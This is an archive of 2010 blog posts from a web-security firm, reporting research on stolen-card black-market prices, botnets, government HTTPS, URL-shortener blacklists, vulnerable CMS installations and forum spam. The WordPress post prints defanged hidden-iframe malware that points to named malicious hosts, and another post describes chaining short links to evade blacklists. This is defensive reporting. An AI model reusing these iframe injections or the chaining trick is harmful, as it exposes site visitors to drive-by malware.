Archive

Archive for the ‘News’ Category

The “Underground” Credit Card Blackmarket

March 3rd, 2010

Credit card data has been traded on the cyber black-market for a number of years. The relatively recent breaches of TJX Companies (owner of T.J. Maxx) and Heartland Payment Systems show the extent to which criminals will go in order to harvest credit card numbers, social security numbers, names, addresses and more. All this legitimate (but stolen) information fuels a world of cyber crime.

In this article we show that, contrary to what you might think, the credit card black-market operates very much in the open. Below we point out websites that anyone can use to tap into the cyber black-market and purchase stolen credit card numbers and the associated credentials. We also show the instant messenger handles, email addresses and details of what cyber criminals are selling on the Internet.

We analyzed 429 unique domains and 615 unique URLs. Each URL led to a web page on which cyber criminals had posted details about how to contact them and buy stolen financial credentials. In the majority of cases, the cyber criminals selling this information can provide one of the following types of data.

The data for this article was collected between February 27th and March 2nd, 2010.

Basic Credit Card Information Offers:

Usually consists of credit card number, type, expiration date and CVV.

USA & CANADA CCV2

VISA/Mastercard ~ 2 USD/each
AmEx/Discover   ~ 4 USD/each

UK & EU CVV2

VISA/Mastercard ~ 3 USD/each
AmEx/Discover   ~ 5 USD/each

Premium Credit Card Information Offers:

Usually consists of credit card number, type, expiration date, CVV, SSN, Home Address, Full Name, Date of Birth and much more.

USA & CANADA CCV2

VISA/Mastercard ~ $35/each

UK & EU

VISA/Mastercard ~ $40/each

ACCOUNT INFORMATION:
First Name: xxxxx
Last Name: xxxxx
Address: xxxxx xxxxx xxxxx xxxxx
Apt:
City: Homestaed
State: FL
Zip: xxxxx
Home Phone: (xxxxx)xxxxx-xxxxx
Work Phone: (xxxxx)xxxxx-xxxxx
Email: xxxxx@yahoo.com
SSN: xxxxx-xxxxx-xxxxx
License Number: xxxxx-xxxxx-xxxxx-xxxxx-xxxxx
License State: FL
DOB: 09/xxxxx/xxxxx

PAYMENT INFORMATION:
Credit Card Type: VISA
Number: xxxxxxxxxxxxxxx
CCV: 889
Expiration Date: 11/2008
Name: xxxxx xxxxx
Card Name First: xxxxx
Card Name Last: xxxxx

PayPal Information Offers:

Verified account                 ~ 20USD/each
Verified account with email pin  ~ 25USD/each
Verified account with full info  ~ 35USD/each
unverified account               ~ 10USD/each

Some domains host multiple instances of stolen credit card ads (CC-Ads). We present the frequency distribution of CC-Ads on each unique domain below.

Frequency of CC-Ads on each unique domain.
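
A frequency distribution of this kind can be computed in a few lines. The sketch below is only an illustration, not the tooling used for this article: the function names and the sample URLs are hypothetical, and it assumes that "domain" means the host name of each URL.

```python
from collections import Counter
from urllib.parse import urlsplit


def ads_per_domain(urls):
    """Count how many ad URLs were seen on each host name."""
    return Counter(urlsplit(u).hostname for u in urls)


def frequency_distribution(per_domain):
    """Map 'ads on a domain' to 'number of domains with that many ads'."""
    return Counter(per_domain.values())


# Hypothetical sample data; the article's real data set is not reproduced here.
sample_urls = [
    "http://forum.example.com/thread/1",
    "http://forum.example.com/thread/2",
    "http://board.example.net/post?id=7",
]
per_domain = ads_per_domain(sample_urls)
distribution = frequency_distribution(per_domain)
```

With the sample above, one domain carries two ads and one domain carries a single ad.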

Interesting Highlights:

  • None of the websites advertising stolen credit card data were blacklisted by Google’s Safe Browsing List. This could indicate that cyber criminals are careful not to do anything that would discourage visitors to these sites.
  • Cyber criminals prefer to get paid via Liberty Reserve and Western Union money transfer services.
  • Some cyber criminals have used images to provide quotations [img].
  • Yahoo.com seems to be the email and instant messaging service preferred by cyber criminals.
  • Nearly 75% of sites with CC-Ads are located in the US (see graph below).
IP Geo-location for websites with CC-Ads.

Conclusion:

It is clear from the current state of the credit card black-market that cyber criminals can operate much too easily on the Internet. They are not afraid to put their email addresses, and in some cases phone numbers and other credentials, in their advertisements. It seems that the black market for cyber criminals is not underground at all. In fact, it’s very “in your face.” Clearly a more concerted effort is required to clamp down on this problem. Simply tying up loose ends on the enterprise side is not enough when there is virtually nothing to stop criminals from touting their stolen wares freely on the Internet.

News, Report, Security

Virus Infects 13 Million PCs, Steals Credit Card Numbers

March 2nd, 2010

“Spain Busts Hackers for Infecting 13 Million PCs”

Users were targeted via a vulnerability in Internet Explorer when they visited websites infected with the malware. Spanish authorities shut down the Mariposa botnet on December 23, 2009, although the details of what is being called the “largest cyber-raid to date” are only now being released.

Infection Statistics:

  • 190 countries
  • 40 of the largest financial institutions
  • 50% of 1,000 largest companies

News, Security

Do Government Websites Care About HTTPS?

February 25th, 2010

Government websites play a critical role in the transfer of information to citizens, visitors, businesspeople and others throughout their lives. Most importantly, many people trust government websites implicitly. Given the immense trust placed in websites that the government relies on to disseminate and collect information, one would expect something as basic as SSL authentication (via certificates) to be in use, so that visitors can be sure they are really connecting to the website they expect.

Consider the fact that malicious individuals and organizations have already targeted government organizations including the FDIC, IRS, FBI and many more with success. The government response trying to educate the masses can be found in many places. [1] [2] [3]

The goal of this experiment:

  • To determine whether government sites provide authentication information using HTTPS.
  • To identify characteristics of government websites using or not using HTTPS.

Experiment methodology:

An initial corpus of 150 government websites was mined (via USA.gov). Each website was tested for three signs that indicate whether it employs any authentication mechanism to prove its identity to a visitor.

This experiment was conducted between February 24th and February 25th, 2010.

The three points are listed below:

  1. Does the website offer an SSL connection secured by a certificate?
    • If it does, we identify the issuer and the expiration date.
  2. Does the website respond to the HTTPS request within 60 seconds?
    • If it does not, we identify the server as mis-configured.
  3. Does the website seem to have pages that have an “https://” in the URL?
    • We find these pages as indexed by Google (e.g. https://secure.site.gov/login.asp).
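
The first two checks can be sketched with Python's standard library. This is a minimal illustration under stated assumptions rather than the test harness used in the experiment: the function names and status labels are hypothetical, port 443 is assumed, and a failed certificate verification is reported as a single status because the default verifier does not distinguish self-signed from expired certificates in the exception type.

```python
import socket
import ssl

SECONDS_PER_DAY = 86400


def classify_expiry(not_after, now_epoch, warn_days=30):
    """Classify a certificate 'notAfter' string relative to a reference time."""
    expires = ssl.cert_time_to_seconds(not_after)
    if expires <= now_epoch:
        return "expired"
    if expires - now_epoch < warn_days * SECONDS_PER_DAY:
        return "expires_soon"
    return "valid"


def check_https(host, now_epoch, timeout=60):
    """Attempt a verified TLS handshake on port 443 and summarize the outcome."""
    context = ssl.create_default_context()
    try:
        with socket.create_connection((host, 443), timeout=timeout) as raw:
            with context.wrap_socket(raw, server_hostname=host) as tls:
                cert = tls.getpeercert()
    except ssl.SSLCertVerificationError:
        # Self-signed, untrusted, expired or mismatched certificate.
        return {"status": "untrusted_or_invalid"}
    except OSError:
        # Timeouts, refused connections and other handshake failures.
        return {"status": "no_https_or_misconfigured"}
    # The issuer is a tuple of RDNs, each a tuple of (key, value) pairs.
    issuer = dict(pair for rdn in cert["issuer"] for pair in rdn)
    return {
        "status": classify_expiry(cert["notAfter"], now_epoch),
        "issuer": issuer.get("organizationName"),
        "not_after": cert["notAfter"],
    }
```

Calling check_https("www.example.gov", time.time()) (a hypothetical host, with the time module imported) would return the issuer and expiry classification for a site whose certificate verifies, or one of the two failure statuses otherwise.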

We present the most interesting results here:

  • Only 53% of government sites offer an SSL certificate to prove their identity.
    Note: The certificates for these sites will not expire in less than 30 days.
  • Approximately 6% of government sites have self-signed SSL certificates or certificates signed by authorities which are not widely recognized.
    Note: Accessing these websites via a modern browser will cause a warning message to be displayed.
  • Approximately 13% of government sites use expired SSL certificates to prove their identity.
  • Approximately 1% of government sites have credentials which will expire in less than 30 days.
  • A whopping 33% of government sites with HTTPS are mis-configured. However, they work fine with HTTP.
Significant numbers of government websites are not using authentication mechanisms effectively.

Conclusion:

This limited experiment shows that websites operated by the government have a long way to go in terms of proving their identity to end users. These issues should not be treated lightly as they provide impetus to malicious individuals to develop phishing scams targeting government owned infrastructure.

Note: Due to the sensitive nature of this information we will not disclose specific government sites with security issues.

News, Report, Security

stopthehacker.com Attends Technology Forum

February 22nd, 2010

The stopthehacker.com team traveled to Omaha, Nebraska, in early February to meet with other cyber security companies and corporate, academic and government leaders. Anirban Banerjee, stopthehacker.com co-founder, appeared in a video interview conducted by Jeff Slobotski of the Silicon Prairie News.

Watch Anirban describe the goals of stopthehacker.com:

Thanks again to the Silicon Prairie News for covering us at the event!

Company, News

The Curse of the URL Shorteners: How Safe Are They?

February 19th, 2010

URL shortening services have become all the rage on the Internet. These services take a long URL as input and produce a short, easy-to-use URL as output. Simple! By virtue of their ease of use, millions of Internet surfers use them to post messages on Twitter. In fact, URL shortening services like bit.ly have garnered so much attention that even giants like Google and Microsoft have jumped onto the URL shortening bandwagon.

Case in point:

These URL shortening services are a godsend for Internet surfers tired of copying and pasting long, ugly-looking URLs. But hold on a minute! All is not hunky-dory in URL Shortening Land.

Due to processes inherent to “URL Shortening,” the original URL an Internet surfer might like to shorten is, for all purposes, being obfuscated. Is this a problem? Yes. Why, you ask? Consider the fact that people, not even necessarily tech-savvy ones, have learned to double check the links present in their emails and on websites. They even have help from various browser plugins, but in general, users are smartening up. When these same people see “shortened” links, they have no way to make a judgment call on whether visiting the link is safe, or not. For example, you may recognize www.stopthehacker.com as being a benign, safe to visit link, but what about bit.ly/oJMrP or bit.ly/dc38ze?

Articles published from credible sources, like ISC SANS, show that URL shortening services, when compromised, can provide an excellent mechanism for malicious hackers to infect unsuspecting visitors. Criminals use these services to bypass Google’s Safe Browsing service, which is used by popular browsers.

To combat this growing menace, URL shortening services have partnered with security companies to identify malicious URLs and websites. Some of them even use the SURBL blacklists to identify if someone has tried to link to a malicious website.

This article attempts to identify the effectiveness of security measures put in place by the various URL shortening services.

This experiment answers the following questions:

  • Do URL shortening services have any kind of security measures in place?
  • How effective are these security measures?

We compare the 25 URL shortening services listed below. Each service is analyzed to measure the effectiveness of its security measures, using a two-stage process.

snipr.com
budurl.com
bit.ly
short.to
twurl.nl
chilp.it
fon.gs
ub0.cc
snurl.com
fwd4.me
short.ie
a.gd
hurl.ws
kl.am
to.ly
hex.io
tr.im
cli.gs
urlborg.com
is.gd
sn.im
ur1.ca
tweetburner.com
tinyurl.com
snipurl.com

Experiment methodology:

An initial corpus of 932 websites was obtained from Malware Patrol, a well-respected source of information about malware-infected websites, which receives nearly 3,500,000 hits/month. This experiment was conducted between February 2nd and February 4th, 2010.

For each URL obtained from Malware Patrol, we attempt to create shortened URLs for each site domain and full URL using each of the 25 services.

Stage 1 asks: does the URL shortening service allow a user to create a URL pointing to a malicious domain (e.g. http://www.badsite.dom)? We denote a service as Stage 1 Compliant if it appears to use a security service or blacklist to identify malicious domains and does not allow a user to create a shortened link to any infected domain.

Stage 2 asks: does the URL shortening service allow a user to create a URL pointing to a malicious link hosted on a malicious domain (e.g. http://www.badsite.dom/badfolder/badfile)? We denote a service as Stage 2 Compliant if it uses a security service or blacklist to identify malicious domains and does not allow a user to create a shortened link to any infected domain or to any malicious full URL hosted on that domain.
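
The two-stage scoring can be sketched as follows. This is an illustrative simplification, not the evaluation code used here: the function names are hypothetical, the input is assumed to be a list of (malicious URL, was the shortening attempt blocked) pairs for one service, and Stage 2 is scored on full URLs only so that the two stages can be reported separately.

```python
from urllib.parse import urlsplit


def is_domain_only(url):
    """True when the URL has no path beyond '/', no query and no fragment."""
    parts = urlsplit(url)
    return parts.path in ("", "/") and not parts.query and not parts.fragment


def stage_compliance(attempts):
    """Score one service from (malicious_url, was_blocked) pairs."""
    attempts = list(attempts)
    domain_results = [blocked for url, blocked in attempts if is_domain_only(url)]
    full_results = [blocked for url, blocked in attempts if not is_domain_only(url)]
    return {
        # A single unblocked attempt is enough to fail a stage.
        "stage1": bool(domain_results) and all(domain_results),
        "stage2": bool(full_results) and all(full_results),
    }
```

A service that blocks http://www.badsite.dom but accepts http://www.badsite.dom/badfolder/badfile would score Stage 1 Compliant only.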

We present the most interesting results in brief:

  • Approximately 68% of URL shortening services were Stage 1 Compliant.
  • Approximately 56% of URL shortening services were exclusively Stage 2 Compliant.
  • Approximately 52% of URL shortening services were both Stage 1 Compliant and Stage 2 Compliant (see graph below).

Observations on specific URL shortening services:

  • bit.ly seems to favor blocking malicious domains rather than specific links.
  • fwd4.me, hurl.ws and urlborg.com seem to favor blocking malicious links rather than specific domains.
  • bit.ly failed to qualify as Stage 2 Compliant due to 0.5% of tested URLs.
  • fwd4.me failed to qualify as Stage 1 Compliant due to 9.8% of tested URLs.
  • hurl.ws failed to qualify as Stage 1 Compliant due to 0.3% of tested URLs.
  • urlborg.com failed to qualify as Stage 1 Compliant due to 0.3% of tested URLs.

Venn Diagram depicting URL filtering capabilities of URL shortening services. Only about half of the most popular URL shortening services are effective at blocking malicious URLs.

Stage 1 Compliant and Stage 2 Compliant services:

budurl.com
cli.gs
fon.gs
hex.io
is.gd
kl.am
sn.im
snipr.com
snipurl.com
snurl.com
to.ly
tr.im
ub0.cc

Deeper security issues remain:

It seems that popular services like bit.ly, which use blacklists to prevent malicious hackers from pointing shortened links at bad websites, can still be easily fooled by chaining together shortened URLs created by another service. We have found that if a malicious user can create a shortened URL using a service that does not implement blacklist checks, or whose checks are not effective, then a service like bit.ly can be tricked into redirecting the visitor via that shortened URL to a malicious domain. Effectively, users can be redirected to a malicious site even though bit.ly performs all its checks. See the appendix for an example (wget log).
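
One way to guard against chaining is to resolve the whole redirect chain and check every hop, not just the first link. The sketch below illustrates the idea only and makes no claim about how any shortening service works: the function names are hypothetical, and the next_hop callable stands in for an HTTP lookup so that the logic can be shown without network access.

```python
from urllib.parse import urlsplit


def follow_chain(start_url, next_hop, max_hops=10):
    """Follow redirects via next_hop(url) until a final URL, a loop or the hop limit."""
    chain = [start_url]
    while len(chain) <= max_hops:
        target = next_hop(chain[-1])
        if target is None or target in chain:
            break
        chain.append(target)
    return chain


def first_blacklisted(chain, blacklisted_hosts):
    """Return the first URL in the chain whose host is blacklisted, else None."""
    for url in chain:
        if urlsplit(url).hostname in blacklisted_hosts:
            return url
    return None


# Hypothetical redirect table: one shortener points at another shortener.
redirects = {
    "http://short-a.example/x": "http://short-b.example/y",
    "http://short-b.example/y": "http://www.badsite.dom/badfolder/badfile",
}
chain = follow_chain("http://short-a.example/x", redirects.get)
hit = first_blacklisted(chain, {"www.badsite.dom"})
```

Checking only the first hop (short-b.example) would miss the malicious destination, which is the weakness described above.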

Conclusion:

This limited experiment shows that URL shortening services have a long way to go before Internet users can trust them to deliver safe links. About half of the most popular URL shortening services seem to be somewhat effective at blocking access to well known malicious URLs that can be found on blacklists. It remains to be seen if these URL shortening services can improve and provide a safer web experience for their users.

News, Report, Security

Analyzing Popular CMSs: Are vBulletin Users at Risk?

February 8th, 2010

This article is the last in our series on CMS analysis. This time we focus on vBulletin. We have previously profiled Joomla, WordPress, Drupal and phpBB.

vBulletin is a little different from the other CMSs we have analyzed in this series. The first and most apparent difference is that it is not free software: the vBulletin site displays a cost of $195-$285 for a new license. The obvious question, then, is why people pay for this CMS when other good CMSs are available for free. The answer lies in its varied list of features, such as a built-in photo album, event management and more. Add to this good support, compatibility with existing software, many themes, built-in integration for payment engines and advertisement support… it’s not hard to see why vBulletin has acquired a large fan base.

Next, we will take a closer look at vBulletin to understand security issues facing active installations seen publicly on the Internet.

The aim of this experiment:

  • To determine the number of vBulletin sites using older versions of the CMS package (and hence vulnerable to attacks).
  • To identify the associated scripts that vBulletin users install in addition to core vBulletin functionality.
  • To identify the vulnerabilities introduced by using the associated scripts.

Experiment methodology:

An initial corpus of 100,000 websites was mined (via Google) using a keyword search to locate websites which discussed vBulletin. Understandably, not all 100,000 websites would actually be using vBulletin. Approximately 10,000 websites from this corpus were analyzed. Each website was analyzed to determine if it was generated by vBulletin or its associated plugins. Each website was then cross-referenced with the Google Safe Browsing List. This experiment was conducted between February 5th and February 8th, 2010.

Distribution of vBulletin versions:

In 93.09% of sites running on vBulletin the version number could be identified. We found the following distribution of vBulletin versions in the websites examined (where versions of installations could be determined). A more detailed breakdown of the distribution of vBulletin versions can be seen at the end of this article.

Significant numbers of older vBulletin installations are present on the Internet.

Note: Publicly available information about exploits for vBulletin 3.x.x and earlier versions exists. [1] [2]

We present the most interesting results here:

Conclusion:

This limited experiment shows that, like WordPress, vBulletin suffers from a large number of vulnerable installations on the Internet. It is intriguing to see that a CMS which is not free, and which is tightly controlled, is not kept up to date across the board. Consider the case of Drupal, where we observed very little variety in the versions of the installations. The natural question at this point is: why is a free CMS like Drupal doing better, security-wise, than a commercial CMS like vBulletin? Why are most Drupal installations up to date? One thing to note, though, is that like Drupal and phpBB, vBulletin installations seem to be relatively safe from the most prevalent malware. Most Iframes on vBulletin sites are ads, a likely revenue stream for most forum admins.

The fact remains that there are many vulnerable installations of vBulletin which can fall prey to malicious hackers.

Till next time.

News, Report, Security

Analyzing Popular CMSs: Are WordPress Users at Risk?

February 2nd, 2010

Following up on our last article, this time we will be discussing issues relevant to what is likely the most popular CMS software package available today: WordPress. WordPress is used by a plethora of individuals and organizations, from bloggers to content publishers, news media outlets and many more. The great thing about this particular CMS is the level to which it can be customized and the number of plugins that exist for it.

WordPress is a prime example of a popular CMS. With more than 8,176 plugins and 73,037,498 downloads, this particular CMS package is extremely popular! I would agree with the statement on the WordPress site which proclaims: “WordPress is a state-of-the-art publishing platform with a focus on aesthetics, web standards, and usability.” It is.

WordPress also offers the flexibility to manage content easily, add attractive themes and customize webpages to your heart’s content. And again quoting the main site: “Plugins can extend WordPress to do almost anything you can imagine.” I would agree with this too.

In this post we will be looking at WordPress closely to understand any interesting properties of the active installations publicly seen on the Internet.

The aim of this experiment:

  • To determine the number of WordPress sites using older versions of the CMS package (and hence vulnerable to attacks).
  • To identify the associated scripts that WordPress users install in addition to core WordPress functionality.
  • To identify the vulnerabilities introduced by using the associated scripts.

Experiment methodology:

An initial corpus of 100,000 websites was mined (via Google) using a keyword search to locate websites which discussed WordPress. Understandably, not all 100,000 websites would actually be using WordPress. Approximately 10,000 websites from this corpus were analyzed. Each website was analyzed to determine if it was generated by WordPress or its associated plugins. Each website was then cross-referenced with the Google Safe Browsing List. This experiment was conducted between January 28th and January 30th, 2010.

Distribution of WordPress versions:

  • 30.9% of sites were running version 2.9.1
  • 4.7% of sites were running version 2.9
  • 9.14% of sites were running version 2.8.6
  • 4.7% of sites were running version 2.8.5
  • 21.42% of sites were running version 2.8.4
  • 7.1% of sites were running version 2.8.2
  • 9.14% of sites were running version 2.7.1
  • 2.3% of sites were running version 2.6.2
  • 2.3% of sites were running version 2.6
  • 2.3% of sites were running version 2.1.3
  • 2.3% of sites were running version 2.0.4

The distribution above covers the websites examined for which the installation version could be determined.
Note: Publicly available information about exploits for WordPress versions earlier than 2.8.6 exists.
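
One common way to read a WordPress version from a page is the generator meta tag that default WordPress themes emit. The sketch below assumes that approach. The article does not say how versions were determined, the function names are hypothetical, and sites that strip the tag would simply go undetected. The 2.8.6 threshold comes from the note above.

```python
import re

# Matches e.g. <meta name="generator" content="WordPress 2.9.1" />
GENERATOR_RE = re.compile(
    r'<meta\s+name=["\']generator["\']\s+content=["\']WordPress\s+([\d.]+)["\']',
    re.IGNORECASE,
)


def wordpress_version(html):
    """Return the version as a tuple of ints, or None if no generator tag is found."""
    match = GENERATOR_RE.search(html)
    if not match:
        return None
    return tuple(int(part) for part in match.group(1).split(".") if part)


def has_known_exploits(version, fixed_in=(2, 8, 6)):
    """True for versions earlier than the threshold (tuple comparison)."""
    return version < fixed_in
```

For example, a page advertising WordPress 2.8.4 parses to (2, 8, 4) and is flagged, while 2.9.1 is not.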

We present the most interesting results in brief:

Examples of malware found:

Now we present some examples of the non-obfuscated malware that was detected on some of the analyzed sites.

Example Code #1,  detected on: olgamake.com/wp-login.php?action=lostpassword

<if ra e src="hxxp://a151.scrappi ng.cc:80 80/ts/in. cgi ?op en" width=971 height=0 style="visibility: hi dden"></i fra m e>

Example Code #2,  detected on: makinghimknown.com/wp-login.php

<if ra e src="src="hxxp://ke ymydoma ins.com/" width="3" height="2"></i fra m e>

Example Code #3,  detected on: bisoppreview.com/wp-login.php

<if ra e src="hxxp://ntw porta l.com/" w idth="2" hei ght="4"</i fra m e>

Conclusion:

This limited experiment shows that there are many older WordPress installations active on the Internet. Furthermore, some of them have been infected by non-obfuscated Iframes which point to malicious websites to load exploit code dynamically. WordPress makes for an easy target by virtue of its popularity and wide installation base. The people associated with this CMS software take security very seriously and have done a great job releasing security patches and stable releases. However, the fact remains that vulnerable versions of WordPress are live on the Internet and are hosting malware, primarily via infected Iframes.

Till next time.

News, Report

Analyzing Popular CMSs: Are Joomla Users at Risk?

February 1st, 2010

In this series of articles, we will be discussing issues relevant to popular Content Management Systems (CMS). These software packages make it relatively simple for web-administrators and lay people to host a website or an Internet forum and manage the content on it. Using a CMS, one can easily keep track of various versions of web-pages, allow visitors to contribute to the pages and host complex discussion forums too.

CMS software packages have gained widespread popularity owing to the easy-to-use interface they provide to web-administrators. CMS packages can be easy to set up. Most web hosting companies already have CMS packages ready to be set up on their clients’ accounts. All the clients need to do is click a button in their hosting control panel! Furthermore, maintaining web-pages using CMS software takes away the pain of keeping track of multiple versions, manually granting user permissions and other mundane issues.

Joomla is a prime example of a popular CMS package. With thousands of downloads and upwards of 7,000 followers on Twitter, this CMS package is extremely popular among web-administrators and content publishers. Joomla offers the flexibility to manage content easily, add attractive themes and customize web-pages to your heart’s content. All this can be achieved without having any programming experience.

In this series of posts, we will be looking at five popular CMSs. Joomla is the first one on which we will focus.

The aim of the experiment:

  • To determine the number of Joomla sites using older versions of the CMS package (and hence vulnerable to attacks).
  • To identify the associated scripts that Joomla users install in addition to core Joomla functionality.
  • To identify the vulnerabilities introduced by using the associated scripts.

Experiment methodology:

An initial corpus of 100,000 websites was mined (via Google) using a keyword search to locate websites which discussed Joomla. Understandably, not all 100,000 websites would actually be using Joomla. Approximately 10,000 websites from this corpus were analyzed. Each website was analyzed to determine if it was generated by Joomla. Each website was also cross-referenced with the Google Safe Browsing List. The experiment was conducted between January 27th and January 29th, 2010.

We present the most interesting results in brief:

This limited experiment showed that there is a correlation between Joomla installations and vulnerabilities targeted by hackers to spread malware. It will be interesting to compare this trend with the trends of the CMS packages that we will analyze in the coming days. Nonetheless, it is heartening to see that none of the websites hosting Joomla 1.5 were actually listed on Google’s Safe Browsing List.

Till next time.

News, Report

“Online Pharmacy” Spam Stalks Internet Forums/Boards

January 26th, 2010

Malicious hackers have, for many years, been offering services to unscrupulous individuals and companies for monetary compensation. With the growth of email spam advertising everything from medical supplements to cars and lottery tickets, email scrubbers and filters have taken the game up a notch by implementing ever-increasing layers of complexity to cut down on such spam. In turn, hackers have started to advertise their spam, such as medication offers and fraudulent scams, by compromising web-based message boards and forums.

Hackers employ two basic techniques:

  • Creating large numbers of users on forums. These accounts are then used to post spam on the message boards.
  • Exploiting Web Application vulnerabilities in the software used to run the forum.

Approximately two weeks ago, Lenny Zeltser, from ISC SANS, posted an informative article about online pharmacy ads popping up on message boards. In this vein we have conducted a limited experiment with about 14,000 websites which contain spam announcing online pharmacies.

The aim of the experiment:

  • What percentage of websites which advertise online pharmacies are message boards and Internet forums?
  • What Web Applications, e.g. CMS packages, are used on the message boards that are compromised?

We believe this will provide a rough estimate of how focused hackers are on using message boards and forums on the Internet to advertise spam. From another perspective, it will give us some idea of how vulnerable a website is to abuse by hackers if it hosts a message board or forum.

Testing methodology:

We have used Google to mine the websites which contain certain keyword patterns such as “buy zocor online”, or “buy brand kamagra online” etc. Once the links suggested by Google were mined, each of the websites was tested against Google’s Safe Browsing List to determine if they had hosted malware (according to Google). Next, an analysis was done to determine if the link(s) mined from Google pointed to a forum or message board. This was done by identifying the presence of multiple strings inside a link. For example, if a link has the keywords “topic”, “view”, “thread” or similar keywords, including characters associated with dynamic page generation, it is probably hosting a message board or forum.
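
The link-based forum check described above can be sketched as a simple keyword heuristic. This is an illustration under stated assumptions, not the classifier used in the test: the function name and the two-hit threshold are hypothetical, only the three keywords named above are used, and the presence of a query string is treated as the sign of dynamic page generation.

```python
from urllib.parse import urlsplit

# Keywords named in the text; the real list of "similar keywords" is not given.
FORUM_KEYWORDS = ("topic", "view", "thread")


def looks_like_forum(url, min_hits=2):
    """Heuristic: several forum-like strings in the link suggest a message board."""
    parts = urlsplit(url.lower())
    text = parts.path + "?" + parts.query
    hits = sum(1 for keyword in FORUM_KEYWORDS if keyword in text)
    if parts.query:
        # A query string ('?', '=') suggests a dynamically generated page.
        hits += 1
    return hits >= min_hits
```

A link such as http://example.com/viewtopic.php?t=42 is flagged as a probable forum, while http://example.com/about.html is not. A heuristic like this will produce some false positives, since it relies on link text alone.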

The test was conducted between January 21st and January 23rd, 2010.

Popular software packages installed on compromised forums and message boards.

We present the most interesting results below:

  • 47.9% of websites displaying “online pharmacy” spam are message boards and forums.
  • None of the websites advertising “online pharmacy” spam were listed on Google Safe Browsing List.
  • 20.28% of forums displaying “online pharmacy” spam were using jQuery.
  • 15.73% of forums displaying “online pharmacy” spam were using phpBB.
  • 11.54% of forums displaying “online pharmacy” spam were using WordPress.
  • 10.84% of forums displaying “online pharmacy” spam were using MooTools.

These results and other software packages, helper-scripts, tracking-code are depicted in the graph presented above.

This small experiment shows that a high percentage of websites displaying online spam campaigns are message boards or forums. This indicates that there are many unsecured software installations and older software packages still in use which are often exploited by malicious individuals to post spam. Further, jQuery was the most common package found on the affected forums. This supports our previous observations regarding jQuery scripts being used to push malware to unsuspecting visitors.

Company, News, Report

Where Can You Find (2.8 million) Safe Websites?

January 19th, 2010

Hackers are hitting websites hard and fast. Every day, upwards of 6,000 new websites are compromised by malware due to code injection, FTP credential compromise, weak server security, web-application flaws and the full gamut of other security issues.

In this vein, any system used to determine whether a website is clean or infected needs to be able to handle large numbers of sites for analysis. This ability ensures a high throughput rate when analyzing “suspect” sites.

One of our goals at StopTheHacker.com is to target throughput rates in excess of 1,000,000 sites per day. This obviously necessitates an automated process with high reliability and accuracy (we have it). To develop such an automated process, we focus heavily on advanced Machine Learning and Artificial Intelligence techniques which can learn from compromised websites and update themselves to catch even more bad websites. All on the fly.

In order to develop training sets for machine-learning based automated solutions, one needs to get hold of a massive dataset. We recently profiled over 2.8 million websites (2,800,560 to be exact). What dataset is this? All these profiled sites were sourced from DMOZ. Surprisingly, none of these websites are listed in the Google Safe Browsing List as of January 19, 2010.
Note: DMOZ is a user-edited directory of sites (which provided a good starting point for this experiment).

Each website is classified according to a categorization scheme described here. We used the description to download and analyze around 2.8 million sites. Each site name was entered in a program which calculated a hash of the site name and looked it up on the Google Safe Browsing List to determine if the website was on the malware list or not.
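
The hash-and-lookup step can be illustrated as follows. This is a sketch under loud assumptions: it does not reproduce the actual Safe Browsing protocol, which defines its own URL canonicalization and hash format. SHA-256, the normalization rule, the function names and the locally held set of hashes are all hypothetical choices made for illustration.

```python
import hashlib


def site_hash(site_name):
    """Hash a normalized host name (normalization rule is an assumption)."""
    normalized = site_name.strip().lower().rstrip(".")
    return hashlib.sha256(normalized.encode("utf-8")).hexdigest()


def is_listed(site_name, listed_hashes):
    """Check whether the site's hash appears in a locally held set of hashes."""
    return site_hash(site_name) in listed_hashes


# Hypothetical list with a single entry, for demonstration only.
listed = {site_hash("www.badsite.dom")}
```

Looking up hashes in a set keeps each check at constant time on average, which matters when millions of site names are processed.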

Interestingly, we did not find any of the sites on the Google Safe Browsing List. This definitely adds a feather of sorts to DMOZ Directory’s proverbial hat. I think they might just be able to claim that they are the “largest and safest human-edited directory on the web”!

A graphical representation of the top 50 categories, sorted by those having the most websites is presented, followed by a list of the top 100 categories.

News, Report, Security